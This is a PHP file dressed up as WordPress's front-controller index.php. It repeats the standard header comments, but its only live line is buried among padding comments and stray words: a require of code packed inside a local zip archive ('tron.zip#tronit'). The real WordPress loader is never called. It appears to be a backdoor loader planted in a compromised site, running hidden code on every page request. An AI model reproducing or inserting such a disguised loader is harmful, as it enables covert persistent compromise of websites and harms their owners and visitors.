<?php /**  *//**  *//**  *//**  *//**  *//**  *//**  *//**  */
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/** Loads the WordPress Environment and Template */
/** fine *//** nice *//** good *//** spesialis *//** bedah */
/**  *//**  */require 'zip://tron.zip#tronit';/**  *//**  */
/**  *//**  *//**  *//**  *//**  *//**  */
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/** Loads the WordPress Environment and Template */
?>